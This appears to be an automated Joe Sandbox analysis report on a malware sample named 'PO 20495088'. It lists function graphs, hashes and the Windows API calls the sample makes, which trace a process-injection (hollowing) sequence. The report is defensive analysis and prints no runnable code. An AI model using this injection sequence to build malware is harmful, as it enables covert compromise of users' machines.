                                                                                                        • Opcode ID: 6cdfd857015cabbc22e61845b40fa1df06a5ab769f3b890dc977f231bccf3d26
                                                                                                        • Instruction ID: 76f4a575cae43753420a63034ac43a01171c00356ba0a8c044cb18a2e7d369e1
                                                                                                        • Opcode Fuzzy Hash: 6cdfd857015cabbc22e61845b40fa1df06a5ab769f3b890dc977f231bccf3d26
                                                                                                        • Instruction Fuzzy Hash: E932AB70B012059FEB19EB79C460BAEB7F6BF88300F55446AE546EB3A0DB35E901CB51
                                                                                                        Function 0748CA85 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1276 748ca85-748cb25 1279 748cb5e-748cb7e 1276->1279 1280 748cb27-748cb31 1276->1280 1287 748cb80-748cb8a 1279->1287 1288 748cbb7-748cbe6 1279->1288 1280->1279 1281 748cb33-748cb35 1280->1281 1282 748cb58-748cb5b 1281->1282 1283 748cb37-748cb41 1281->1283 1282->1279 1285 748cb43 1283->1285 1286 748cb45-748cb54 1283->1286 1285->1286 1286->1286 1289 748cb56 1286->1289 1287->1288 1290 748cb8c-748cb8e 1287->1290 1294 748cbe8-748cbf2 1288->1294 1295 748cc1f-748ccd9 CreateProcessA 1288->1295 1289->1282 1292 748cb90-748cb9a 1290->1292 1293 748cbb1-748cbb4 1290->1293 1296 748cb9c 1292->1296 1297 748cb9e-748cbad 1292->1297 1293->1288 1294->1295 1299 748cbf4-748cbf6 1294->1299 1308 748ccdb-748cce1 1295->1308 1309 748cce2-748cd68 1295->1309 1296->1297 1297->1297 1298 748cbaf 1297->1298 1298->1293 1300 748cbf8-748cc02 1299->1300 1301 748cc19-748cc1c 1299->1301 1303 748cc04 1300->1303 1304 748cc06-748cc15 1300->1304 1301->1295 1303->1304 1304->1304 1306 748cc17 1304->1306 1306->1301 1308->1309 1319 748cd78-748cd7c 1309->1319 1320 748cd6a-748cd6e 1309->1320 1321 748cd8c-748cd90 1319->1321 1322 748cd7e-748cd82 1319->1322 1320->1319 1323 748cd70 1320->1323 1325 748cda0-748cda4 1321->1325 1326 748cd92-748cd96 1321->1326 1322->1321 1324 748cd84 1322->1324 1323->1319 1324->1321 1328 748cdb6-748cdbd 1325->1328 1329 748cda6-748cdac 1325->1329 1326->1325 1327 748cd98 1326->1327 1327->1325 1330 748cdbf-748cdce 1328->1330 1331 748cdd4 1328->1331 1329->1328 1330->1331 1332 748cdd5 1331->1332 1332->1332
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0748CCC6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 226ff09a8673bdb62c12af31fa91de057de1da9514edaa856e8dc2b5bfcd2356
                                                                                                        • Instruction ID: 90c606737ca62deca58b0321a70520d33a1e54596cd504888590b7dcfff4d102
                                                                                                        • Opcode Fuzzy Hash: 226ff09a8673bdb62c12af31fa91de057de1da9514edaa856e8dc2b5bfcd2356
                                                                                                        • Instruction Fuzzy Hash: 17914EB1D0061ACFDB50EF69C8817EEBBB2FF44310F1481AAD818A7250D7749985CFA1
                                                                                                        Function 0748CA90 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1334 748ca90-748cb25 1336 748cb5e-748cb7e 1334->1336 1337 748cb27-748cb31 1334->1337 1344 748cb80-748cb8a 1336->1344 1345 748cbb7-748cbe6 1336->1345 1337->1336 1338 748cb33-748cb35 1337->1338 1339 748cb58-748cb5b 1338->1339 1340 748cb37-748cb41 1338->1340 1339->1336 1342 748cb43 1340->1342 1343 748cb45-748cb54 1340->1343 1342->1343 1343->1343 1346 748cb56 1343->1346 1344->1345 1347 748cb8c-748cb8e 1344->1347 1351 748cbe8-748cbf2 1345->1351 1352 748cc1f-748ccd9 CreateProcessA 1345->1352 1346->1339 1349 748cb90-748cb9a 1347->1349 1350 748cbb1-748cbb4 1347->1350 1353 748cb9c 1349->1353 1354 748cb9e-748cbad 1349->1354 1350->1345 1351->1352 1356 748cbf4-748cbf6 1351->1356 1365 748ccdb-748cce1 1352->1365 1366 748cce2-748cd68 1352->1366 1353->1354 1354->1354 1355 748cbaf 1354->1355 1355->1350 1357 748cbf8-748cc02 1356->1357 1358 748cc19-748cc1c 1356->1358 1360 748cc04 1357->1360 1361 748cc06-748cc15 1357->1361 1358->1352 1360->1361 1361->1361 1363 748cc17 1361->1363 1363->1358 1365->1366 1376 748cd78-748cd7c 1366->1376 1377 748cd6a-748cd6e 1366->1377 1378 748cd8c-748cd90 1376->1378 1379 748cd7e-748cd82 1376->1379 1377->1376 1380 748cd70 1377->1380 1382 748cda0-748cda4 1378->1382 1383 748cd92-748cd96 1378->1383 1379->1378 1381 748cd84 1379->1381 1380->1376 1381->1378 1385 748cdb6-748cdbd 1382->1385 1386 748cda6-748cdac 1382->1386 1383->1382 1384 748cd98 1383->1384 1384->1382 1387 748cdbf-748cdce 1385->1387 1388 748cdd4 1385->1388 1386->1385 1387->1388 1389 748cdd5 1388->1389 1389->1389
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0748CCC6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: d58b08f20b3c2543f3ddfbc3b1faa44514aea3044206124a03710247e1359e6a
                                                                                                        • Instruction ID: 5e4b66ad6cde4a7d851ae3e41840f4013f4606383b4eb87475b746a9ba9df383
                                                                                                        • Opcode Fuzzy Hash: d58b08f20b3c2543f3ddfbc3b1faa44514aea3044206124a03710247e1359e6a
                                                                                                        • Instruction Fuzzy Hash: 75914DB1D0061ECFDB54EF69C8817EEBBB2BF44310F1485AAD818A7250DB749985CFA1
                                                                                                        Function 0158AD28 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1391 158ad28-158ad37 1392 158ad39-158ad46 call 158a0a0 1391->1392 1393 158ad63-158ad67 1391->1393 1398 158ad48 1392->1398 1399 158ad5c 1392->1399 1395 158ad69-158ad73 1393->1395 1396 158ad7b-158adbc 1393->1396 1395->1396 1402 158adc9-158add7 1396->1402 1403 158adbe-158adc6 1396->1403 1447 158ad4e call 158afc0 1398->1447 1448 158ad4e call 158afb0 1398->1448 1399->1393 1404 158add9-158adde 1402->1404 1405 158adfb-158adfd 1402->1405 1403->1402 1407 158ade9 1404->1407 1408 158ade0-158ade7 call 158a0ac 1404->1408 1410 158ae00-158ae07 1405->1410 1406 158ad54-158ad56 1406->1399 1409 158ae98-158af58 1406->1409 1412 158adeb-158adf9 1407->1412 1408->1412 1442 158af5a-158af5d 1409->1442 1443 158af60-158af8b GetModuleHandleW 1409->1443 1413 158ae09-158ae11 1410->1413 1414 158ae14-158ae1b 1410->1414 1412->1410 1413->1414 1416 158ae28-158ae2a call 158a0bc 1414->1416 1417 158ae1d-158ae25 1414->1417 1421 158ae2f-158ae31 1416->1421 1417->1416 1422 158ae3e-158ae43 1421->1422 1423 158ae33-158ae3b 1421->1423 1424 158ae61-158ae6e 1422->1424 1425 158ae45-158ae4c 1422->1425 1423->1422 1432 158ae70-158ae8e 1424->1432 1433 158ae91-158ae97 1424->1433 1425->1424 1427 158ae4e-158ae5e call 158a0cc call 158a0dc 1425->1427 1427->1424 1432->1433 1442->1443 1444 158af8d-158af93 1443->1444 1445 158af94-158afa8 1443->1445 1444->1445 1447->1406 1448->1406
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0158AF7E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: cfa620855bda496243cdee49c2a07849eb688edb5bcb53aa36b42ff249a6da49
                                                                                                        • Instruction ID: b32ecd5705e65002350fd2dee5fcb7ab253ec5f3555f2bee644cc4e8d85a59ef
                                                                                                        • Opcode Fuzzy Hash: cfa620855bda496243cdee49c2a07849eb688edb5bcb53aa36b42ff249a6da49
                                                                                                        • Instruction Fuzzy Hash: E57135B0A00B058FDB25EF6AD44475ABBF1FF88300F00892ED59AEBA54D774E945CB91
                                                                                                        Function 015858EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1449 15858ec-15859b9 CreateActCtxA 1451 15859bb-15859c1 1449->1451 1452 15859c2-1585a1c 1449->1452 1451->1452 1459 1585a2b-1585a2f 1452->1459 1460 1585a1e-1585a21 1452->1460 1461 1585a40 1459->1461 1462 1585a31-1585a3d 1459->1462 1460->1459 1464 1585a41 1461->1464 1462->1461 1464->1464
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 015859A9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: 6558d8067c16baa117616446875c9de1a9ce3ad26455d4beb646f6637c50b9bf
                                                                                                        • Instruction ID: 519fce0c3e7805c656f1071c5cf87b5d5a6077402e4a21acb94220eccdec2476
                                                                                                        • Opcode Fuzzy Hash: 6558d8067c16baa117616446875c9de1a9ce3ad26455d4beb646f6637c50b9bf
                                                                                                        • Instruction Fuzzy Hash: E941EFB1C10719CBDB24DFA9C884BDDBBB5BF49304F20815AD408BB255EBB5694ACF90
                                                                                                        Function 015844B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1465 15844b0-15859b9 CreateActCtxA 1468 15859bb-15859c1 1465->1468 1469 15859c2-1585a1c 1465->1469 1468->1469 1476 1585a2b-1585a2f 1469->1476 1477 1585a1e-1585a21 1469->1477 1478 1585a40 1476->1478 1479 1585a31-1585a3d 1476->1479 1477->1476 1481 1585a41 1478->1481 1479->1478 1481->1481
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 015859A9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: 21163da705b9091f2e94a8f4c5a403658c75a523862c3246e6eb2bd1bdba89c5
                                                                                                        • Instruction ID: 9fd9b9cb685cabc6adbe450dc75f043390ce6e832b4b9f3f1962f4fa45bd01bd
                                                                                                        • Opcode Fuzzy Hash: 21163da705b9091f2e94a8f4c5a403658c75a523862c3246e6eb2bd1bdba89c5
                                                                                                        • Instruction Fuzzy Hash: 4841CEB0C10719CBDB24DFA9C884B9EBBF5BF49304F60816AD408BB255DBB56945CF90
                                                                                                        Function 054E4050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1482 54e4050-54e408c 1483 54e413c-54e415c 1482->1483 1484 54e4092-54e4097 1482->1484 1490 54e415f-54e416c 1483->1490 1485 54e40ea-54e4122 CallWindowProcW 1484->1485 1486 54e4099-54e40d0 1484->1486 1487 54e412b-54e413a 1485->1487 1488 54e4124-54e412a 1485->1488 1492 54e40d9-54e40e8 1486->1492 1493 54e40d2-54e40d8 1486->1493 1487->1490 1488->1487 1492->1490 1493->1492
                                                                                                        APIs
                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 054E4111
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345576448.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54e0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallProcWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714655100-0
                                                                                                        • Opcode ID: 96a7ce1c1f01116db6440d7f90776cfd3f28966e1729e7f079ea8a3e0355da03
                                                                                                        • Instruction ID: 76ac1850989e1ce6b0fedc80279f1b80a8b675392c5f4d05fe8b5725466a1a19
                                                                                                        • Opcode Fuzzy Hash: 96a7ce1c1f01116db6440d7f90776cfd3f28966e1729e7f079ea8a3e0355da03
                                                                                                        • Instruction Fuzzy Hash: E541E5B9900309CFCB14CF99C848AEAFBF5FB98314F248599D519AB321D775A941CFA0
                                                                                                        Function 0158D6C9 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1496 158d6c9-158d6d0 1497 158d68c-158d69c DuplicateHandle 1496->1497 1498 158d6d2-158d7f6 1496->1498 1499 158d69e-158d6a4 1497->1499 1500 158d6a5-158d6c2 1497->1500 1499->1500
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0158D5CE,?,?,?,?,?), ref: 0158D68F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 1e57ae4a763595f64c40071c1680fe6170f0fbf4776c7f2e79dbc8c133016cfe
                                                                                                        • Instruction ID: 8bcc8f3f13af20d1e95f09d01a797874a0b4d3209308318f7e4e9112cef3457d
                                                                                                        • Opcode Fuzzy Hash: 1e57ae4a763595f64c40071c1680fe6170f0fbf4776c7f2e79dbc8c133016cfe
                                                                                                        • Instruction Fuzzy Hash: 4431B238A803499FE708DF60E8957B97BA7F784394F118439E9218B3C8CAB44865CB11
                                                                                                        Function 0748C800 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1515 748c800-748c856 1518 748c858-748c864 1515->1518 1519 748c866-748c8a5 WriteProcessMemory 1515->1519 1518->1519 1521 748c8ae-748c8de 1519->1521 1522 748c8a7-748c8ad 1519->1522 1522->1521
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0748C898
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: fe2ba4559dc3e15cbb6b5cc038e9036e3c380ee1eb0d24269115b640413c7ee0
                                                                                                        • Instruction ID: 32865e9f7b0f09c3ead334bcb1c81aa6e69eb0fe2fdeb4a7d5dd802733357b7a
                                                                                                        • Opcode Fuzzy Hash: fe2ba4559dc3e15cbb6b5cc038e9036e3c380ee1eb0d24269115b640413c7ee0
                                                                                                        • Instruction Fuzzy Hash: CB215AB1D003099FCB10DFA9C985BDEBBF5FF48310F10842AE919A7241D7789944DBA1
                                                                                                        Function 0748C808 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0748C898
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 15f37803cca17f09ed1f34df101e01d19a113fc77e599bc46d239b84b4850c33
                                                                                                        • Instruction ID: dccdfb2c87b025b1994fc29348a22556ea1942cad640cc973bc7bd9b45aeb460
                                                                                                        • Opcode Fuzzy Hash: 15f37803cca17f09ed1f34df101e01d19a113fc77e599bc46d239b84b4850c33
                                                                                                        • Instruction Fuzzy Hash: DF2127B19003599FCB10DFA9C985BDEBBF5FF48310F10882AE919A7241D7789944DBA4
                                                                                                        Function 0748C668 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0748C6EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: cfe298c5a14e324d00eb2b89ce3496acb57f4d34725ff73ba14e19f76e79f60e
                                                                                                        • Instruction ID: d1f28b4d1ae12bae4a493fce03900d2edf664713bbe430d1109d5b9d7758d701
                                                                                                        • Opcode Fuzzy Hash: cfe298c5a14e324d00eb2b89ce3496acb57f4d34725ff73ba14e19f76e79f60e
                                                                                                        • Instruction Fuzzy Hash: 9C213AB29003098FDB50DFAAC4857EEBFF4EF88324F14842AD559A7241DB789945CFA1
                                                                                                        Function 0748C8F0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0748C978
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: 91ea09f2ea1e9d45d976f570e31524062caceb5edeeab51873e3671972bb8300
                                                                                                        • Instruction ID: 0f4820ffde75586eb598a8f84b37bce505b0b281e307fd08aef095a5ffb094cb
                                                                                                        • Opcode Fuzzy Hash: 91ea09f2ea1e9d45d976f570e31524062caceb5edeeab51873e3671972bb8300
                                                                                                        • Instruction Fuzzy Hash: 49214AB18003199FCB10DFA9C885BDEFBF5FF48320F54842AE918A3250D7349940DBA1
                                                                                                        Function 0158CF5C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0158D5CE,?,?,?,?,?), ref: 0158D68F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 5ec38ff38a5345f7312cc3913721b44b05ac5f47418d339c2776f93e2ceef47f
                                                                                                        • Instruction ID: 3de0ca6927d3c8b2329b02ceddcc8a58c28d6d6bcd3b45f1660e73a0255a36a2
                                                                                                        • Opcode Fuzzy Hash: 5ec38ff38a5345f7312cc3913721b44b05ac5f47418d339c2776f93e2ceef47f
                                                                                                        • Instruction Fuzzy Hash: D221F4B5900208AFDB10DF9AD884ADEBBF4FB48314F14841AE918B7350D378A940CFA5
                                                                                                        Function 0158D600 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0158D5CE,?,?,?,?,?), ref: 0158D68F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 322c597f97fbd82b94d8f27210f055f6c36bf59effd33d229bd11396e0c5388a
                                                                                                        • Instruction ID: 33725f872b092a886a4016d3ae5e9c4c231d2a1d27b8cd35a09ee95a960eaa1a
                                                                                                        • Opcode Fuzzy Hash: 322c597f97fbd82b94d8f27210f055f6c36bf59effd33d229bd11396e0c5388a
                                                                                                        • Instruction Fuzzy Hash: 1021E4B59002099FDB10CFA9D984ADEBBF5FB48324F14841AE958B7351D378A944CF61
                                                                                                        Function 0748C670 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0748C6EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: a5407bc33986fbf21ee9329c6313ed6e72d5fbc31ae42afb7ef2af423bb159b6
                                                                                                        • Instruction ID: 63a4f0954c4efd382f18b44bec6efad1a76da26849c9ae3cc92d7955d80cd287
                                                                                                        • Opcode Fuzzy Hash: a5407bc33986fbf21ee9329c6313ed6e72d5fbc31ae42afb7ef2af423bb159b6
                                                                                                        • Instruction Fuzzy Hash: AA2149B1D003098FDB10DFAAC4857EEBBF4EF88324F14842AD519A7241CB789945CFA0
                                                                                                        Function 0748C8F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0748C978
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: 07f0087e241c984949d0a07f6dcbf36f09b3476da65fac4bc2f764c8cc7c48ae
                                                                                                        • Instruction ID: 5558a74bd7fc83e55ddc58c1d2ce5e0cc11708245c95e2848741c6c596e1e6ee
                                                                                                        • Opcode Fuzzy Hash: 07f0087e241c984949d0a07f6dcbf36f09b3476da65fac4bc2f764c8cc7c48ae
                                                                                                        • Instruction Fuzzy Hash: AB2128B18003599FCB10DFAAC884AEEFBF5FF48320F50842AE519A7250D7389940DBA0
                                                                                                        Function 0748C740 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0748C7B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 6577ec6832b1cc39202f1509c1619e48f9fe725537677e23228aef6084eb97ea
                                                                                                        • Instruction ID: 6c1992bf3d8d1bf29a9e288f3f74a465267c7970e3de48637e196187d23c365b
                                                                                                        • Opcode Fuzzy Hash: 6577ec6832b1cc39202f1509c1619e48f9fe725537677e23228aef6084eb97ea
                                                                                                        • Instruction Fuzzy Hash: 54116D769003499FDB10DFAAC845ADFBFF5EF48320F14841AD519A7250C7359540CFA0
                                                                                                        Function 0748C748 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0748C7B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 927efcc34d8e31b76e444a827b445f322f4efedf60eabc18a58618caf442dfaf
                                                                                                        • Instruction ID: adccd33190cbb6e4fbc89f9e832458908ed2e10b0323486faf324a3d4ba31eba
                                                                                                        • Opcode Fuzzy Hash: 927efcc34d8e31b76e444a827b445f322f4efedf60eabc18a58618caf442dfaf
                                                                                                        • Instruction Fuzzy Hash: E0111C769003499FDB10DFA9C845ADFBFF5EF88320F14841AD515A7250C7759544DFA0
                                                                                                        Function 0748C5B9 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 49346c9fb7714563a98da020226f44cb6f2004bd1b813cb6bba549be001ecd24
                                                                                                        • Instruction ID: 0fbb39d032c957b1e8d6f7cb8f6f337d44f4904a0f2cacb8163d43603be925b4
                                                                                                        • Opcode Fuzzy Hash: 49346c9fb7714563a98da020226f44cb6f2004bd1b813cb6bba549be001ecd24
                                                                                                        • Instruction Fuzzy Hash: 56115BB1D003498BDB20DFAAD4857EEFFF4EF98320F14846AD519A7240CB355940CBA4
                                                                                                        Function 0748C5C0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
